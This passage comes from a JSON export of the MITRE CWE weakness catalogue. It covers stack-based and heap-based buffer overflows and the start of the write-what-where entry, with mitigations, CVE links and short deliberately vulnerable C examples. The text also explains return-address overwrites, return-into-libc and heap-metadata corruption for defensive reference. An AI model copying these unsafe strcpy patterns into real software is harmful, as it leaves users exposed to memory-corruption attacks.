Potential_Mitigations, References, Relationship_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Other_Notes, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Detection_Factors, Potential_Mitigations, References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings, Time_of_Introduction, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Demonstrative_Examples, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Common_Consequences, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples, Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Demonstrative_Examples, Likelihood_of_Exploit, References, Relationships, Taxonomy_Mappings, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Common_Consequences, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Alternate_Terms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Unbounded Transfer (\'Classic Buffer Overflow\')","attr":{"@_Date":"2008-10-14"}}}},"121":{"attr":{"@_ID":"121","@_Name":"Stack-based Buffer Overflow","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"A stack-based buffer overflow condition is a condition where the buffer being overwritten is allocated on the stack (i.e., is a local variable or, rarely, a parameter to a function).","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"788","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"787","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Background_Details":{"Background_Detail":"There are generally several security-critical data on an execution stack that can lead to arbitrary code execution. The most prominent is the stored return address, the memory address at which execution should continue once the current function is finished executing. The attacker can overwrite this value with some memory address to which the attacker also has write access, into which they place arbitrary code to be run with the full privileges of the vulnerable program. Alternately, the attacker can supply the address of an important call, for instance the POSIX system() call, leaving arguments to the call on the stack. This is often called a return into libc exploit, since the attacker generally forces the program to jump at return time into an interesting routine in the C standard library (libc). Other important data commonly on the stack include the stack pointer and frame pointer, two values that indicate offsets for computing memory addresses. Modifying those values can often be leveraged into a \\"write-what-where\\" condition."},"Alternate_Terms":{"Alternate_Term":{"Term":"Stack Overflow","Description":"\\"Stack Overflow\\" is often used to mean the same thing as stack-based buffer overflow, however it is also used on occasion to mean stack exhaustion, usually a result from an excessively recursive function call. Due to the ambiguity of the term, use of stack overflow to describe either circumstance is discouraged."}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Availability","Impact":["Modify Memory","DoS: Crash, Exit, or Restart","DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)"],"Note":"Buffer overflows generally lead to crashes. Other attacks leading to lack of availability are possible, including putting the program into an infinite loop."},{"Scope":["Integrity","Confidentiality","Availability","Access Control"],"Impact":["Modify Memory","Execute Unauthorized Code or Commands","Bypass Protection Mechanism"],"Note":"Buffer overflows often can be used to execute arbitrary code, which is usually outside the scope of a program\'s implicit security policy."},{"Scope":["Integrity","Confidentiality","Availability","Access Control","Other"],"Impact":["Modify Memory","Execute Unauthorized Code or Commands","Bypass Protection Mechanism","Other"],"Note":"When the consequence is arbitrary code execution, this can often be used to subvert any other security service."}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-10"},"Phase":"Build and Compilation","Strategy":"Compilation or Build Hardening","Description":{"xhtml:p":["Run or compile the software using features or extensions that automatically provide a protection mechanism that mitigates or eliminates buffer overflows.","For example, certain compilers and extensions provide automatic buffer overflow detection mechanisms that are built into the compiled code. Examples include the Microsoft Visual Studio /GS flag, Fedora/Red Hat FORTIFY_SOURCE GCC flag, StackGuard, and ProPolice."]},"Effectiveness":"Defense in Depth","Effectiveness_Notes":"This is not necessarily a complete solution, since these mechanisms can only detect certain types of overflows. In addition, an attack could still cause a denial of service, since the typical response is to exit the application."},{"Phase":"Architecture and Design","Description":"Use an abstraction library to abstract away risky APIs. Not a complete solution."},{"Phase":"Build and Compilation","Description":"Compiler-based canary mechanisms such as StackGuard, ProPolice and the Microsoft Visual Studio /GS flag. Unless this provides automatic bounds checking, it is not a complete solution."},{"Phase":"Implementation","Description":"Implement and perform bounds checking on input."},{"Phase":"Implementation","Description":"Do not use dangerous functions such as gets. Use safer, equivalent functions which check for boundary errors."},{"Phase":"Operation","Description":"Use OS-level preventative functionality, such as ASLR. This is not a complete solution."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"While buffer overflow examples can be rather complex, it is possible to have very simple, yet still exploitable, stack-based buffer overflows:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#define BUFSIZE 256int main(int argc, char **argv) {}","xhtml:br":"","xhtml:div":{"#text":"char buf[BUFSIZE];strcpy(buf, argv[1]);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}},"Body_Text":"The buffer size is fixed, but there is no guarantee the string in argv[1] will not exceed this size and cause an overflow."},{"attr":{"@_Demonstrative_Example_ID":"DX-1"},"Intro_Text":"This example takes an IP address from a user, verifies that it is well formed and then looks up the hostname and copies it into a buffer.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void host_lookup(char *user_supplied_addr){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"struct hostent *hp;in_addr_t *addr;char hostname[64];in_addr_t inet_addr(const char *cp);validate_addr_form(user_supplied_addr);addr = inet_addr(user_supplied_addr);hp = gethostbyaddr( addr, sizeof(struct in_addr), AF_INET);strcpy(hostname, hp-&gt;h_name);","xhtml:br":["","","","","","","","","",""],"xhtml:i":"/*routine that ensures user_supplied_addr is in the right format for conversion */"}}}},"Body_Text":["This function allocates a buffer of 64 bytes to store the hostname, however there is no guarantee that the hostname will not be larger than 64 bytes. If an attacker specifies an address which resolves to a very large hostname, then the function may overwrite sensitive data or even relinquish control flow to the attacker.","Note that this example also contains an unchecked return value (CWE-252) that can lead to a NULL pointer dereference (CWE-476)."]}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Stack overflow"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP8","Entry_Name":"Faulty Buffer Access"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ARR38-C","Entry_Name":"Guarantee that library functions do not form invalid pointers","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"STR31-C","Entry_Name":"Guarantee that storage for strings has sufficient space for character data and the null terminator","Mapping_Fit":"CWE More Specific"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1029"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 5, &#34;Stack Overruns&#34; Page 129"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 5: Buffer Overruns.&#34; Page 89"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 3, &#34;Nonexecutable Stack&#34;, Page 76"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 5, &#34;Protection Mechanisms&#34;, Page 189"}},{"attr":{"@_External_Reference_ID":"REF-18"}}]},"Notes":{"Note":{"#text":"Stack-based buffer overflows can instantiate in return address overwrites, stack pointer overwrites or frame pointer overwrites. They can also be considered function pointer overwrites, array indexer overwrites or write-what-where condition, etc.","attr":{"@_Type":"Other"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Alternate_Terms, Applicable_Platforms, Background_Details, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"KDM Analytics","Modification_Date":"2009-07-17","Modification_Comment":"Improved the White_Box_Definition"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Background_Details, Causal_Nature, Likelihood_of_Exploit, References, Relationships, Taxonomy_Mappings, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Demonstrative_Examples"}]}},"122":{"attr":{"@_ID":"122","@_Name":"Heap-based Buffer Overflow","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"A heap overflow condition is a buffer overflow, where the buffer that can be overwritten is allocated in the heap portion of memory, generally meaning that the buffer was allocated using a routine such as malloc().","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"788","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"787","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Availability","Impact":["DoS: Crash, Exit, or Restart","DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)"],"Note":"Buffer overflows generally lead to crashes. Other attacks leading to lack of availability are possible, including putting the program into an infinite loop."},{"Scope":["Integrity","Confidentiality","Availability","Access Control"],"Impact":["Execute Unauthorized Code or Commands","Bypass Protection Mechanism","Modify Memory"],"Note":"Buffer overflows often can be used to execute arbitrary code, which is usually outside the scope of a program\'s implicit security policy. Besides important user data, heap-based overflows can be used to overwrite function pointers that may be living in memory, pointing it to the attacker\'s code. Even in applications that do not explicitly use function pointers, the run-time will usually leave many in memory. For example, object methods in C++ are generally implemented using function pointers. Even in C programs, there is often a global offset table used by the underlying runtime."},{"Scope":["Integrity","Confidentiality","Availability","Access Control","Other"],"Impact":["Execute Unauthorized Code or Commands","Bypass Protection Mechanism","Other"],"Note":"When the consequence is arbitrary code execution, this can often be used to subvert any other security service."}]},"Potential_Mitigations":{"Mitigation":[{"Description":"Pre-design: Use a language or compiler that performs automatic bounds checking."},{"Phase":"Architecture and Design","Description":"Use an abstraction library to abstract away risky APIs. Not a complete solution."},{"Phase":"Build and Compilation","Description":"Pre-design through Build: Canary style bounds checking, library changes which ensure the validity of chunk data, and other such fixes are possible, but should not be relied upon."},{"Phase":"Implementation","Description":"Implement and perform bounds checking on input."},{"Phase":"Implementation","Strategy":"Libraries or Frameworks","Description":"Do not use dangerous functions such as gets. Look for their safe equivalent, which checks for the boundary."},{"Phase":"Operation","Description":"Use OS-level preventative functionality. This is not a complete solution, but it provides some defense in depth."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"While buffer overflow examples can be rather complex, it is possible to have very simple, yet still exploitable, heap-based buffer overflows:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#define BUFSIZE 256int main(int argc, char **argv) {}","xhtml:br":"","xhtml:div":{"#text":"char *buf;buf = (char *)malloc(sizeof(char)*BUFSIZE);strcpy(buf, argv[1]);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}},"Body_Text":"The buffer is allocated heap memory with a fixed size, but there is no guarantee the string in argv[1] will not exceed this size and cause an overflow."},{"attr":{"@_Demonstrative_Example_ID":"DX-19"},"Intro_Text":"This example applies an encoding procedure to an input string and stores it into a buffer.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char * copy_input(char *user_supplied_string){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int i, dst_index;char *dst_buf = (char*)malloc(4*sizeof(char) * MAX_SIZE);if ( MAX_SIZE &lt;= strlen(user_supplied_string) ){}dst_index = 0;for ( i = 0; i &lt; strlen(user_supplied_string); i++ ){}return dst_buf;","xhtml:br":["","","","",""],"xhtml:div":[{"#text":"die(\\"user string too long, die evil hacker!\\");","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if( \'&amp;\' == user_supplied_string[i] ){}else if (\'&lt;\' == user_supplied_string[i] ){}else dst_buf[dst_index++] = user_supplied_string[i];","xhtml:div":[{"#text":"dst_buf[dst_index++] = \'&amp;\';dst_buf[dst_index++] = \'a\';dst_buf[dst_index++] = \'m\';dst_buf[dst_index++] = \'p\';dst_buf[dst_index++] = \';\';","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""]},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"/* encode to &amp;lt; */"}}],"xhtml:br":["",""]}}]}}}},"Body_Text":"The programmer attempts to encode the ampersand character in the user-controlled string, however the length of the string is validated before the encoding procedure is applied. Furthermore, the programmer assumes encoding expansion will only expand a given character by a factor of 4, while the encoding of the ampersand expands by 5. As a result, when the encoding procedure expands the string it is possible to overflow the destination buffer if the attacker provides a string of many ampersands."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2007-4268","Description":"Chain: integer signedness error (CWE-195) passes signed comparison, leading to heap overflow (CWE-122)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4268"},{"Reference":"CVE-2009-2523","Description":"Chain: product does not handle when an input string is not NULL terminated (CWE-170), leading to buffer over-read (CWE-125) or heap-based buffer overflow (CWE-122).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2523"},{"Reference":"CVE-2021-29529","Description":"Chain: machine-learning product can have a heap-based\\n\\t      buffer overflow (CWE-122) when some integer-oriented bounds are\\n\\t      calculated by using ceiling() and floor() on floating point values\\n\\t      (CWE-1339)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29529"}]},"Affected_Resources":{"Affected_Resource":"Memory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Heap overflow"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP8","Entry_Name":"Faulty Buffer Access"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"STR31-C","Entry_Name":"Guarantee that storage for strings has sufficient space for character data and the null terminator","Mapping_Fit":"CWE More Specific"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"92"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 5, &#34;Heap Overruns&#34; Page 138"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 5: Buffer Overruns.&#34; Page 89"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 3, &#34;Nonexecutable Stack&#34;, Page 76"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 5, &#34;Protection Mechanisms&#34;, Page 189"}},{"attr":{"@_External_Reference_ID":"REF-18"}}]},"Notes":{"Note":{"#text":"Heap-based buffer overflows are usually just as dangerous as stack-based buffer overflows.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Common_Consequences, Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Likelihood_of_Exploit, Observed_Examples, References, Relationships, Taxonomy_Mappings, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Observed_Examples"}]}},"123":{"attr":{"@_ID":"123","@_Name":"Write-what-where Condition","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"Any condition where the attacker has the ability to write an arbitrary value to an arbitrary location, often as the result of a buffer overflow.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"787","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Resultant"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":["Integrity","Confidentiality","Availability","Access Control"],"Impact":["Modify Memory","Execute Unauthorized Code or Commands","Gain Privileges or Assume Identity","DoS: Crash, Exit, or Restart","Bypass Protection Mechanism"],"Note":"Clearly, write-what-where conditions can be used to write data to areas of memory outside the scope of a policy. Also, they almost invariably can be used to execute arbitrary code, which is usually outside the scope of a program\'s implicit security policy. If the attacker can overwrite a pointer\'s worth of memory (usually 32 or 64 bits), they can redirect a function pointer to their own malicious code. Even when the attacker can only modify a single byte arbitrary code execution can be possible. Sometimes this is because the same problem can be exploited repeatedly to the same effect. Other times it is because the attacker can overwrite security-critical application-specific data -- such as a flag indicating whether the user is an administrator."},{"Scope":["Integrity","Availability"],"Impact":["DoS: Crash, Exit, or Restart","Modify Memory"],"Note":"Many memory accesses can lead to program termination, such as when writing to addresses that are invalid for the current process."},{"Scope":["Access Control","Other"],"Impact":["Bypass Protection Mechanism","Other"],"Note":"When the consequence is arbitrary code execution, this can often be used to subvert any other security service."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Strategy":"Language Selection","Description":"Use a language that provides appropriate memory abstractions."},{"Phase":"Operation","Description":"Use OS-level preventative functionality integrated after the fact. Not a complete solution."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The classic example of a write-what-where condition occurs when the accounting information for memory allocations is overwritten in a particular fashion. Here is an example of potentially vulnerable code:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#define BUFSIZE 256int main(int argc, char **argv) {}","xhtml:br":"","xhtml:div":{"#text":"char *buf1 = (char *) malloc(BUFSIZE);char *buf2 = (char *) malloc(BUFSIZE);strcpy(buf1, argv[1]);free(buf2);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""]}}},"Body_Text":["Vulnerability in this case is dependent on memory layout. The call to strcpy() can be used to write past the end of buf1, and, with a typical layout, can overwrite the accounting information that the system keeps for buf2 when it is allocated. Note that if the allocation header for buf2 can be overwritten, buf2 itself can be overwritten as well.","The allocation header will generally keep a linked list of memory \\"chunks\\". Particularly, there may be a \\"previous\\" chunk and a \\"next\\" chunk. Here, the previous chunk for buf2 will probably be buf1, and the next chunk may be null. When the free() occurs, most memory allocators will rewrite the linked list using data from buf2. Particularly, the \\"next\\" chunk for buf1 will be updated and the \\"previous\\" chunk for any subsequent chunk will be updated. The attacker can insert a memory address for the \\"next\\" chunk and a value to write into that memory address for the \\"previous\\" chunk.","This could be used to overwrite a function pointer that gets dereferenced later, replacing it with a memory address that the attacker has legitimate access to, where they have placed malicious code, resulting in arbitrary code execution."]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Write-what-where condition"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ARR30-C","Entry_Name":"Do not form or use out-of-bounds pointers or array subscripts","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ARR38-C","Entry_Name":"Guarantee that library functions do not form invalid pointers","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"STR31-C","Entry_Name":"Guarantee that storage for strings has sufficient space for character data and the null terminator","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"STR32-C","Entry_Name":"Do not pass a non-null-terminated character sequence to a library function that expects a string","Mapping_Fit":"Imprecise"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 5: Buffer Overruns.&#34; Page 89"}},{"attr":{"@_External_Reference_ID":"REF-18"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Common_Consequences, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content 